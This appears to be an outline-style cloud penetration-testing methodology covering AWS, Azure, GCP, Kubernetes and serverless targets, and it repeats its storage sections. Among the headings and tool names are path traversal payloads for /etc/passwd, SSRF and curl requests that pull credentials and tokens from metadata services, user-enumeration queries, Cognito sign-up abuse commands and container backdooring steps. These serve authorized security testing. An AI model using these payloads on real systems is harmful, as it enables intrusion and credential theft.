1. Serverless Functions (SaaS)
1.1. File Read
1.1.1. Path/Directory Traversal
1.1.1.1. file:///proc/self/environ
1.1.1.2. /etc/passwd
1.1.1.3. ../../../../../etc/passwd
1.1.1.4. ..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd
1.1.1.5. \/etc\/passwd
1.1.1.6. ..././..././..././..././..././..././etc/passwd
1.1.1.7. writeups
1.1.1.7.1. https://hackerone.com/reports/497771
1.1.1.7.2. https://hackerone.com/reports/229622
1.1.2. XXE
1.1.2.1. http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance/
1.2. RCE
1.2.1. File Upload
1.2.2. SSTI
1.3. SSRF
1.3.1. Token Stealing
1.3.1.1. AWS doesn't expose the metadata API to Lambda
1.3.1.1.1. Although AWS stores values in environment variables
1.3.1.2. v1beta1 API level still allows non-headered queries (until 30 Sep 2020)
1.3.1.3. Although Azure does give you access to the storage bucket
1.4. Serverless functions can be vulnerable to injection attacks, improper access controls, or excessive permissions.
1.5. Analyze the code for vulnerabilities, perform injection attacks, or test function permissions using tools like AWS Lambda Security Scanner
2. Enumeration
2.1. Asset Enumeration
2.1.1. Subdomains Enumeration
2.1.1.1. Target Domain
2.1.1.1.1. A record test IP
2.1.1.1.2. Tools
2.1.1.2. SaaS Service Providers
2.1.1.2.1. https://github.com/rbsec/dnscan
2.1.1.3. This query confirms if the domain is used in Azure: curl -s "https://login.microsoftonline.com/getuserrealm.srf?login=[USERNAME]&xml=1" | grep -E --colour '<NameSpaceType>[^<]+</NameSpaceType>'
2.2. Username Enumeration
2.2.1. AWS Cloud APIs
2.2.2. Azure Cloud APIs
2.2.2.1. enum_azuread_users
2.2.2.1.1. enum_azuread_users victim.com users.txt
2.2.2.2. This query confirms if the domain is used in Azure: curl -s -X POST https://login.microsoftonline.com/common/GetCredentialType -d '{"Username":"USERNAME"}' | jq -e '.IfExistsResult'
2.2.3. Credential Harvesting
3. Web Applications (IaaS, PaaS, SaaS)
3.1. Cross service credentials for pivoting
3.2. Metadata API
3.2.1. Google
3.2.1.1. http://metadata.google.internal/
3.2.2. Azure
3.2.2.1. curl -i -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
3.2.3. AWS
3.2.3.1. http://169.254.169.254/
3.3. Environment Variables
3.4. Access to other resources via role based access controls
4. Exposed Services
4.1. Storage
4.1.1. Providers
4.1.1.1. AWS: Simple Storage Service (S3)
4.1.1.2. Azure: Azure Storage
4.1.1.3. GCP: Google Cloud Storage
4.1.2. Common Modes
4.1.2.1. Anonymous Access
4.1.2.2. Authenticated Access
4.1.2.3. Restricted to Specific ID
4.1.3. Attack Surface
4.1.3.1. Anonymous access granted on bucket
4.1.3.2. Misconfigured write access for a resource
4.1.3.3. Restricted to auth user (any authenticated user)
4.1.3.4. Lax IAM Rules/Policies giving access to data
4.1.4. AWS Storage Buckets
4.1.4.1. Access buckets
4.1.4.1.1. https://s3.amazonaws.com/bucket_name
4.1.4.1.2. https://<bucketname>.s3.amazonaws.com
4.1.4.2. Bucket Enumeration possible via difference in error messages
4.1.4.2.1. https://s3.amazonaws.com/bucket_name/
4.1.4.3. For REST-style URLs the region now needs to be included
4.1.4.3.1. https://s3.<region>.amazonaws.com/<bucket_name>/
4.1.4.4. Tools
4.1.4.4.1. S3Scanner
4.1.4.4.2. Bucket-stream
4.1.4.4.3. CloudScraper
4.1.4.4.4. S3-inspector
4.1.4.4.5. Buckets.grayhatwarfare.com
4.1.5. Azure Storage Account
4.1.5.1. Azure storage can be accessed at
4.1.5.1.1. https://<storagename>.blob.core.windows.net/<container>
4.1.5.2. Container Content can be listed at
4.1.5.2.1. https://<storagename>.blob.core.windows.net/<container>?restype=container&comp=list
4.1.5.3. Container content can be read directly via web URL
4.1.5.3.1. https://<storagename>.blob.core.windows.net/<container>/<file>
4.1.5.4. Contains
4.1.5.4.1. Blobs
4.1.5.4.2. Queues
4.1.5.4.3. Tables
4.1.5.4.4. Files
4.1.5.5. URLs
4.1.5.5.1. https://<accountname>.<service>.core.windows.net/?sv=2018-03-28&ss=bfqt&srt=sco&sp=rwdlacup&se=2019-09-30T17:13:23Z&st=2019-09-30T09:13:23Z&sip=88.208.222.83&spr=https&sig=LCoN4d%2B%2BZSzPtPO71fMS34k%2FhLf2Wjen9pzhlAGFfPU%3D
4.1.6. Tools
4.1.6.1. URL Scraper
4.1.6.1.1. Extracts cloud URLs from the HTML source of the website: https://github.com/jordanpotti/CloudScraper
4.1.6.2. Bucket Enumeration
4.1.6.2.1. Cloud_enum: https://github.com/initstring/cloud_enum
4.2. Azure AD/Services
4.2.1. Azure AD
4.2.1.1. Authentication Method
4.2.1.1.1. PHS: (Password Hash Synchronization)
4.2.1.1.2. PTA: (Pass Through Authentication)
4.2.1.1.3. ADFS: (AD Federation Service)
4.2.1.2. Authenticated Enumeration
4.2.1.2.1. Identities
4.2.1.2.2. Resources
4.2.1.2.3. Tools
4.2.1.3. Unauthenticated Enumeration
4.2.1.3.1. Identify if Domain is part of AD
4.2.1.3.2. Discover Various Cloud Assets hosted on Azure
4.2.1.3.3. Enumerate Valid users via multiple API endpoints
4.2.1.4. Unauthenticated Recon
4.2.1.5. Gaining Foothold
4.2.1.5.1. Password Spray
4.2.1.6. Authenticated Recon
4.2.1.7. Abusing privileges
4.2.1.8. Lateral and Horizontal Escalation
4.2.2. Azure KeyVault
4.2.2.1. Secrets
4.2.2.1.1. tokens
4.2.2.1.2. passwords
4.2.2.1.3. API Keys
4.2.2.2. Keys
4.2.2.2.1. encryption keys
4.2.2.3. Certificate
4.2.2.3.1. Public and private TLS/SSL certificates
4.2.3. Azure SQL Database
4.2.3.1. MS-SQL instance
4.2.3.2. Hosted under database.windows.net
4.3. AWS Cognito
4.3.1. User Pools
4.3.1.1. aws cognito-identity get-id --identity-pool-id 'region:pool_id'
4.3.2. Identity Pools
4.3.2.1. aws cognito-identity get-credentials-for-identity --identity-id 'Identity'
4.3.3. Attacks
4.3.3.1. Signup Allowed
4.3.3.1.1. aws cognito-idp sign-up --client-id <client_id> --username [email protected] --password P@ssw0rd1 --user-attributes Name="email",Value="[email protected]" Name="name",Value="user"
4.3.3.1.2. aws cognito-idp confirm-sign-up --client-id <client_id> --username [email protected] --confirmation-code XXXXX
4.3.3.1.3. Login
4.3.3.1.4. Get Credentials
4.3.3.2. Cognito Login
4.3.3.2.1. The .idToken entry in localStorage is the item of interest; login can result in an error because the new user doesn't have a profile yet
4.4. Containers
4.4.1. Kubernetes
4.4.1.1. Attack
4.4.1.1.1. Enumeration
4.4.1.1.2. Attack surface
4.4.1.2. Nodes
4.4.1.2.1. Can be a virtual or Physical Machine
4.4.1.2.2. Containers
4.4.1.3. Kubernetes Control Plane
4.4.1.3.1. Kube controller manager
4.4.1.3.2. Cloud controller manager
4.4.1.4. Tools
4.4.1.4.1. Kube Scheduler
4.4.1.4.2. Kube API Server (attack interface) - runs the Kubernetes API
4.4.1.4.3. kube-proxy
4.4.1.4.4. kubelet
4.4.1.4.5. kubectl
4.4.1.4.6. kubeadm
4.4.1.4.7. Labels - Labels for identifying pods
4.4.1.4.8. Proxy - A load balancer for pods
4.4.1.4.9. etcd - Metadata service (key-value store)
4.4.1.4.10. Replication Controller - Manages replication of pods
4.4.1.4.11. JWT OpenID Connect
4.4.2. Sources
4.4.2.1. Secrets
4.4.2.2. Tokens
4.4.2.3. Passwords
4.4.2.4. Source Code
4.4.2.5. Connection Strings
4.4.3. Write Access
4.4.3.1. Pull a docker image
4.4.3.2. Update the code(backdoor)
4.4.3.3. Build and push the Image
4.4.4. Pod - A group of containers co-located on the same host, like a software package
5. Weak IAM Misconfigurations and Role Escalation
5.1. Found by analyzing IAM policies to identify roles with excessive permissions
5.1.1. Pacu (AWS exploitation framework) can help simulate attacks and identify privilege escalation paths
5.2. Tools
5.2.1. PACU
5.2.2. CloudMapper
5.2.3. WeirdAAL
5.2.4. IAM Vulnerable
6. Initial Access
6.1. Github
6.2. Phishing
6.3. Web application
6.4. Password reuse
6.5. OSINT
7. Post Exploitation
7.1. Enumeration
7.1.1. AWS
7.1.1.1. Tools
7.1.1.1.1. PACU
7.1.1.1.2. ScoutSuite
7.1.1.1.3. barq
7.1.1.1.4. AWS_SERVICE_ENUM
7.1.2. AZURE
7.1.2.1. Tools
7.1.2.1.1. powerzure
7.1.2.1.2. roadrecon
7.1.2.1.3. Stormspotter
7.1.2.1.4. AzureHound
7.1.2.1.5. 365-Stealer
7.1.3. GCP
7.1.3.1. GCP_SERVICE_ENUM
7.2. Abusing
7.2.1. Azure
7.2.1.1. Automation Accounts
7.2.1.2. Intune
7.2.1.3. Virtual Machine
7.2.1.4. App registration
7.2.1.5. Deployment templates
7.2.1.6. Container Registry
7.2.1.7. Azure DevOps
7.2.2. AWS
7.2.2.1. S3
7.2.2.2. EBS
7.2.2.3. EC2
7.2.2.4. ECR
7.2.2.5. ECS
8. Insecure Storage
8.1. Providers
8.1.1. AWS: Simple Storage Service (S3)
8.1.2. Azure: Azure Storage
8.1.3. GCP: Google Cloud Storage
8.2. Common Modes
8.2.1. Anonymous Access
8.2.2. Authenticated Access
8.2.3. Restricted to Specific ID
8.3. Attack Surface
8.3.1. Anonymous access granted on bucket
8.3.2. Misconfigured write access for a resource
8.3.3. Restricted to auth user (any authenticated user)
8.3.4. Lax IAM Rules/Policies giving access to data
8.4. AWS Storage Buckets
8.4.1. Access AWS buckets
8.4.1.1. https://s3.amazonaws.com/bucket_name
8.4.1.2. https://<bucketname>.s3.amazonaws.com
8.4.2. Bucket Enumeration possible via difference in error messages
8.4.2.1. https://s3.amazonaws.com/bucket_name/
8.4.3. For REST-style URLs the region now needs to be included
8.4.3.1. https://s3.<region>.amazonaws.com/<bucket_name>/
8.4.4. Tools
8.4.4.1. S3Scanner
8.4.4.2. Bucket-stream
8.4.4.3. CloudScraper
8.4.4.4. S3-inspector
8.4.4.5. Buckets.grayhatwarfare.com
8.5. Azure Storage Account
8.5.1. Azure storage can be accessed at
8.5.1.1. https://<storagename>.blob.core.windows.net/<container>
8.5.2. Container Content can be listed at
8.5.2.1. https://<storagename>.blob.core.windows.net/<container>?restype=container&comp=list
8.5.3. Container content can be read directly via web URL
8.5.3.1. https://<storagename>.blob.core.windows.net/<container>/<file>
8.5.4. Contains
8.5.4.1. Blobs
8.5.4.2. Queues
8.5.4.3. Tables
8.5.4.4. Files
8.5.5. URLs
8.5.5.1. https://<accountname>.<service>.core.windows.net/?sv=2018-03-28&ss=bfqt&srt=sco&sp=rwdlacup&se=2019-09-30T17:13:23Z&st=2019-09-30T09:13:23Z&sip=88.208.222.83&spr=https&sig=LCoN4d%2B%2BZSzPtPO71fMS34k%2FhLf2Wjen9pzhlAGFfPU%3D
8.6. Tools
8.6.1. URL Scraper
8.6.1.1. Extracts cloud URLs from the HTML source of the website
8.6.1.2. https://github.com/jordanpotti/CloudScraper
8.6.2. Bucket Enumeration
8.6.2.1. Cloud_enum: https://github.com/initstring/cloud_enum
9. SSRF
9.1. IaaS
9.1.1. File uploaders, avatar fetchers, RSS feed parsers, PDF generation services
9.1.2. Import/Export Features
9.1.3. External APIs that let users input a URL
9.1.4. Exploit SSRF to grab sensitive info from the AWS, Azure Cloud or Google Cloud metadata service
9.1.4.1. AWS
9.1.4.1.1. http://169.254.169.254/latest/meta-data/iam/security-credentials/
9.1.4.1.2. http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
9.1.4.2. Azure
9.1.4.2.1. curl -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-01-01"
9.1.4.2.2. curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-01-01&resource=https://management.azure.com/"
9.1.4.3. Google Cloud
9.1.4.3.1. curl "http://metadata.google.internal/computeMetadata/v1/instance/" -H "Metadata-Flavor: Google"
9.2. SaaS
9.2.1. Internal API and Admin interface
9.2.2. 3rd party integrations
9.2.3. intra-application SSRF
9.3. PaaS
9.3.1. Internal APIs and Services
9.3.2. Service bindings and cloud secrets
9.3.3. Metadata endpoint
9.3.3.1. Google cloud: http://169.254.169.254/computeMetadata/v1
10. Attacking Misconfigurations
10.1. Misconfigured Storage Buckets (S3 buckets can expose sensitive data to the public)
10.1.1. AWS CLI, S3Scanner and Bucket Finder will find publicly accessible S3 buckets -> sensitive data or improper permissions
10.2. Exposed management interfaces like the AWS Management Console or Azure Portal with no or weak MFA
10.3. Tools
10.3.1. S3Scanner
10.3.2. AWS BucketDump
10.3.3. GCP Bucket Brute
10.3.4. Scoutsuite, CloudMapper, Prowler
10.3.5. CloudFox
10.3.5.1. Situational awareness, loot folder
10.3.6. CloudSploit
10.3.7. Prowler